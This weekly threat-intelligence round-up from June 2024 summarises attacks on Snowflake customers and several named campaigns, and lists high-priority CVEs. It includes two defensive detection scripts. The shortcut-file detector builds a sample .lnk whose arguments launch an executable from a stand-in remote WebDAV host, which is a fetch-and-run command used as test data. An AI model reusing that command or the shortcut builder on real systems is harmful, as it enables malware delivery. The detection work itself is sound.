Weekly Cyber Round-up

Intelligence Report

June 13, 2024

UNC5537 targets Snowflake customers via compromised credentials

Starting in April 2024, Mandiant researchers analysed an ongoing campaign targeting Snowflake customer database instances. The researchers determined that the activity relies exclusively on compromised customer credentials that had previously been exposed by multiple infostealer malware families, including VIDAR, RISEPRO, REDLINE, RACOON STEALER, LUMMA, and METASTEALER. In several observed cases, the initial infostealer infection occurred on contractor systems that were also used for personal activities. Mandiant has identified 165 potentially exposed organisations to date. UNC5537 has been observed advertising victim data for sale on cybercrime forums and attempting to extort many of the victims.
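One check a Snowflake customer would run after this report is to isolate successful logins that relied on a password alone and came from a source the account had not used before, and then to look for a single source touching many accounts. The Python below is an added example, not Mandiant's or Snowflake's code; it runs that logic over constructed rows shaped like the SNOWFLAKE.ACCOUNT_USAGE.LOGIN_HISTORY view (a subset of its columns), with the user names, IP addresses, timestamps and baseline date all invented.

```python
"""Triage Snowflake login history for password-only logins from unfamiliar sources."""
from collections import defaultdict
from datetime import datetime

# Constructed sample rows shaped like SNOWFLAKE.ACCOUNT_USAGE.LOGIN_HISTORY
# (a subset of its columns). User names, IPs and timestamps are invented.
LOGIN_HISTORY = [
    {"EVENT_TIMESTAMP": "2024-03-20 09:00:00", "USER_NAME": "ALICE", "CLIENT_IP": "198.51.100.7",
     "REPORTED_CLIENT_TYPE": "SNOWFLAKE_UI", "FIRST_AUTHENTICATION_FACTOR": "PASSWORD",
     "SECOND_AUTHENTICATION_FACTOR": "DUO_PUSH", "IS_SUCCESS": "YES"},
    {"EVENT_TIMESTAMP": "2024-03-22 10:15:00", "USER_NAME": "SVC_ETL", "CLIENT_IP": "203.0.113.5",
     "REPORTED_CLIENT_TYPE": "PYTHON_DRIVER", "FIRST_AUTHENTICATION_FACTOR": "PASSWORD",
     "SECOND_AUTHENTICATION_FACTOR": None, "IS_SUCCESS": "YES"},
    {"EVENT_TIMESTAMP": "2024-04-15 02:41:00", "USER_NAME": "SVC_ETL", "CLIENT_IP": "192.0.2.99",
     "REPORTED_CLIENT_TYPE": "JDBC_DRIVER", "FIRST_AUTHENTICATION_FACTOR": "PASSWORD",
     "SECOND_AUTHENTICATION_FACTOR": None, "IS_SUCCESS": "YES"},
    {"EVENT_TIMESTAMP": "2024-04-15 02:45:00", "USER_NAME": "SVC_ETL", "CLIENT_IP": "203.0.113.5",
     "REPORTED_CLIENT_TYPE": "PYTHON_DRIVER", "FIRST_AUTHENTICATION_FACTOR": "PASSWORD",
     "SECOND_AUTHENTICATION_FACTOR": None, "IS_SUCCESS": "YES"},
    {"EVENT_TIMESTAMP": "2024-04-16 11:00:00", "USER_NAME": "BOB", "CLIENT_IP": "192.0.2.99",
     "REPORTED_CLIENT_TYPE": "JDBC_DRIVER", "FIRST_AUTHENTICATION_FACTOR": "PASSWORD",
     "SECOND_AUTHENTICATION_FACTOR": None, "IS_SUCCESS": "NO"},
    {"EVENT_TIMESTAMP": "2024-04-16 11:02:00", "USER_NAME": "ALICE", "CLIENT_IP": "192.0.2.99",
     "REPORTED_CLIENT_TYPE": "JDBC_DRIVER", "FIRST_AUTHENTICATION_FACTOR": "PASSWORD",
     "SECOND_AUTHENTICATION_FACTOR": "DUO_PUSH", "IS_SUCCESS": "YES"},
]


def _ts(row):
    return datetime.fromisoformat(row["EVENT_TIMESTAMP"])


def is_password_only(row):
    """A successful login whose only factor was a password (the credential an infostealer yields)."""
    return (row["IS_SUCCESS"] == "YES"
            and row["FIRST_AUTHENTICATION_FACTOR"] == "PASSWORD"
            and not row["SECOND_AUTHENTICATION_FACTOR"])


def hunt_password_only_logins(rows, baseline_end):
    """Password-only logins after baseline_end from an (IP, client type) pair the user
    never used successfully during the baseline period."""
    cutoff = datetime.fromisoformat(baseline_end)
    known = defaultdict(set)
    for r in rows:
        if _ts(r) <= cutoff and r["IS_SUCCESS"] == "YES":
            known[r["USER_NAME"]].add((r["CLIENT_IP"], r["REPORTED_CLIENT_TYPE"]))
    findings = []
    for r in sorted(rows, key=_ts):
        if _ts(r) <= cutoff or not is_password_only(r):
            continue
        source = (r["CLIENT_IP"], r["REPORTED_CLIENT_TYPE"])
        if source not in known[r["USER_NAME"]]:
            findings.append({"user": r["USER_NAME"], "ip": r["CLIENT_IP"],
                             "client": r["REPORTED_CLIENT_TYPE"], "time": r["EVENT_TIMESTAMP"]})
    return findings


def shared_source_ips(rows, findings):
    """Flagged IPs that also touched other accounts (success or failure): one source, many victims."""
    hit_ips = {f["ip"] for f in findings}
    users_by_ip = defaultdict(set)
    for r in rows:
        if r["CLIENT_IP"] in hit_ips:
            users_by_ip[r["CLIENT_IP"]].add(r["USER_NAME"])
    return {ip: sorted(users) for ip, users in users_by_ip.items() if len(users) > 1}


if __name__ == "__main__":
    hits = hunt_password_only_logins(LOGIN_HISTORY, "2024-04-01 00:00:00")
    for h in hits:
        print(f"{h['time']} {h['user']} password-only login from new source {h['ip']} ({h['client']})")
    for ip, users in shared_source_ips(LOGIN_HISTORY, hits).items():
        print(f"{ip} touched multiple accounts: {', '.join(users)}")
```

Against a live account the same filter is a query over the LOGIN_HISTORY view restricted to IS_SUCCESS = 'YES' and SECOND_AUTHENTICATION_FACTOR IS NULL. Treat a password-only login from a new source as a triage lead rather than proof of compromise; service accounts that legitimately authenticate without a second factor will appear here until their expected sources are baselined.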

Kimsuky targets South Korean businesses with DurianBeacon and SmallTiger malware

Since November 2023, ASEC researchers have observed an ongoing Kimsuky campaign targeting South Korean businesses, including defense contractors, automobile parts manufacturers, and semiconductor manufacturers. The campaign initially delivered DurianBeacon, a backdoor previously associated with Andariel, but the final payload was replaced with SmallTiger in February 2024. The initial infection vector is currently unknown, though the threat actor was observed abusing victims' internal software update programs for lateral movement. The DurianBeacon cases involved the use of MultiRDP and Meterpreter, with DurianBeacon used to maintain control and steal information. The SmallTiger infections included the installation of Mimikatz and ProcDump for credential harvesting, and in May 2024 the C2 server was moved to GitHub.

Sapphire Werewolf targets Russian industries with Amethyst stealer

Since March 2024, BI[.]ZONE researchers have observed an activity cluster, dubbed Sapphire Werewolf, that has conducted over 300 attacks using a SapphireStealer variant dubbed Amethyst. Amethyst collects browser data, Telegram configuration files, PowerShell logs, and FileZilla and SSH configuration files. The cluster has targeted the Russian education, manufacturing, IT, defense, and aerospace engineering sectors. The researchers assess with medium confidence that phishing emails containing T[.]LY links are used to deliver Amethyst. Several lures were used alongside decoy documents, including an enforcement order, a Central Election Committee leaflet, and a decree from the President of Russia.

DarkPeony ControlPlug campaign abuses MMC files to deliver PlugX malware

NTT Security Holdings researchers identified a DarkPeony campaign, dubbed Operation ControlPlug, that abuses Microsoft Management Console (MMC) files to deliver PlugX malware. The attack abuses the Control Taskpad feature of MMC, which can execute arbitrary commands, and manipulates the appearance settings within the MMC file so that users are tricked into clicking a link. The campaign targets military and government organisations in Myanmar, the Philippines, Mongolia, and Serbia. The attack chain begins when the MMC file is opened and presents the malicious link; clicking it triggers a PowerShell script.

Sticky Werewolf extends targeting to aviation sector

Morphisec researchers observed a new campaign by the threat actor Sticky Werewolf targeting the aviation industry with phishing emails purporting to come from the First Deputy General Director of the Moscow-based company AO OKB Kristall. Rather than placing malicious links in the emails, the latest campaign uses archive files containing LNK files that fetch a payload from WebDAV servers. Among the observed payloads were Rhadamanthys Stealer and Ozone RAT. Based on targeting and geopolitical context, Sticky Werewolf is suspected of links to a pro-Ukrainian cyberespionage group or hacktivists.
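The LNK-to-WebDAV step described above can be spotted from the shortcut file itself: a Windows shortcut stores its target in a LinkInfo block and its command-line arguments in a string-data block, and a WebDAV target appears as a UNC path whose host carries an @SSL or @port suffix or whose path contains a DavWWWRoot component. The Python below is an added example, not Morphisec's tooling or anything from the campaign; it parses the MS-SHLLINK layout directly, builds constructed sample shortcuts (the IP addresses, hosts, paths and file names are invented) and reports which fields carry a WebDAV UNC path.

```python
"""Triage Windows shortcut (.lnk) files for targets or arguments that point at a WebDAV share."""
import re
import struct

# MS-SHLLINK constants: header size, link CLSID {00021401-0000-0000-C000-000000000046}, LinkFlags bits
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_IDLIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))

# Windows resolves these UNC forms through the WebClient (WebDAV) service:
# \\host@SSL\DavWWWRoot\..., \\host@80\..., \\host\DavWWWRoot\...
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+@(?:SSL|\d{1,5})\b|\\DavWWWRoot\\", re.IGNORECASE)


def _cstring(buf, off):
    return buf[off:buf.index(b"\x00", off)].decode("latin-1")


def parse_lnk(data):
    """Extract the LinkInfo target and the StringData fields from a shell link."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    info = {"target": None}
    if flags & HAS_LINK_TARGET_IDLIST:                      # skip the item ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        base = pos
        size, _hdr, li_flags, _vol, lbp_off, cnrl_off, suffix_off = struct.unpack_from("<7I", data, base)
        target = ""
        if li_flags & 0x2:                                  # CommonNetworkRelativeLink: NetNameOffset at +8
            cnrl = base + cnrl_off
            target = _cstring(data, cnrl + struct.unpack_from("<I", data, cnrl + 8)[0])
        elif li_flags & 0x1:                                # VolumeID + LocalBasePath
            target = _cstring(data, base + lbp_off)
        suffix = _cstring(data, base + suffix_off)          # CommonPathSuffix, appended to either form
        info["target"] = target.rstrip("\\") + "\\" + suffix if suffix else target
        pos = base + size
    unicode = bool(flags & IS_UNICODE)
    for name, bit in STRING_FIELDS:                         # CountCharacters, then the characters
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            raw = data[pos:pos + (count * 2 if unicode else count)]
            info[name] = raw.decode("utf-16-le" if unicode else "latin-1")
            pos += len(raw)
    return info


def triage_lnk(data):
    """Return the parsed target/arguments and the list of fields carrying a WebDAV UNC path."""
    info = parse_lnk(data)
    hits = [f for f in ("target", "relative_path", "working_dir", "arguments", "icon_location")
            if info.get(f) and WEBDAV_UNC.search(info[f])]
    return {"target": info["target"], "arguments": info.get("arguments"), "webdav_fields": hits}


def build_lnk(local_base_path=None, net_name=None, path_suffix="", arguments=None):
    """Build a minimal shell link as constructed test input (not a real sample)."""
    flags = HAS_LINK_INFO | IS_UNICODE | (HAS_ARGUMENTS if arguments is not None else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    parts, cursor, li_flags = [], 28, 0                     # 28-byte LinkInfo header, no Unicode offsets
    vol_off = lbp_off = cnrl_off = 0
    if local_base_path is not None:
        li_flags |= 0x1
        vol_off = cursor
        parts.append(struct.pack("<4I", 17, 3, 0, 16) + b"\x00")   # VolumeID: DRIVE_FIXED, empty label
        cursor += 17
        lbp_off = cursor
        parts.append(local_base_path.encode("latin-1") + b"\x00")
        cursor += len(parts[-1])
    if net_name is not None:
        li_flags |= 0x2
        cnrl_off = cursor
        net = net_name.encode("latin-1") + b"\x00"
        parts.append(struct.pack("<5I", 20 + len(net), 0x2, 20, 0, 0x20000) + net)  # NetNameOffset 20, LANMAN
        cursor += len(parts[-1])
    suffix_off = cursor
    parts.append(path_suffix.encode("latin-1") + b"\x00")
    cursor += len(parts[-1])
    link_info = struct.pack("<7I", cursor, 28, li_flags, vol_off, lbp_off, cnrl_off, suffix_off) + b"".join(parts)
    data = header + link_info
    if arguments is not None:
        data += struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return data


# Constructed samples (invented IPs, hosts and paths), not artifacts from the campaign.
SAMPLE_WEBDAV = build_lnk(local_base_path=r"C:\Windows\System32\cmd.exe",
                          arguments=r"/c start \\203.0.113.10@80\DavWWWRoot\docs\invoice.exe")
SAMPLE_LOCAL = build_lnk(local_base_path=r"C:\Program Files\Notepad++\notepad++.exe")
SAMPLE_SMB = build_lnk(net_name=r"\\fileserver\share", path_suffix=r"docs\readme.txt")

if __name__ == "__main__":
    for label, blob in (("webdav", SAMPLE_WEBDAV), ("local", SAMPLE_LOCAL), ("smb", SAMPLE_SMB)):
        print(label, triage_lnk(blob))
```

The parser deliberately reads only the header, LinkInfo and StringData sections, which is where a shortcut's launch command lives; a real triage pipeline would also pull the ExtraData blocks (tracker and environment-variable data) and handle shortcuts whose arguments are obfuscated through environment expansion, which this example does not attempt.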

High Priority Vulnerabilities

Name             Software                    Base score (CVSS)   Temporal score (CVSS)
CVE-2024-4577    PHP                         9.8                 7.0
    Related: TellYouThePass ransomware campaign actively exploits critical PHP vulnerability
CVE-2024-4610    Valhall GPU Kernel Driver   7.8                 7.8
    Related: CVE-2024-4610 – Arm Mali GPU Zero-Day Under Active Exploit: Millions of Devices at Risk
CVE-2022-42475   FortiProxy SSL-VPN          9.8                 9.4
    Related: Chinese cyber espionage campaign targets ‘dozens’ of Western governments, Dutch officials say
CVE-2024-26169   Windows                     7.8                 6.8
    Related: Ransomware Attackers May Have Used Privilege Escalation Vulnerability as Zero-day
CVE-2017-0199    Office                      7.8                 6.0
    Related: New Agent Tesla Campaign Targeting Spanish-Speaking People
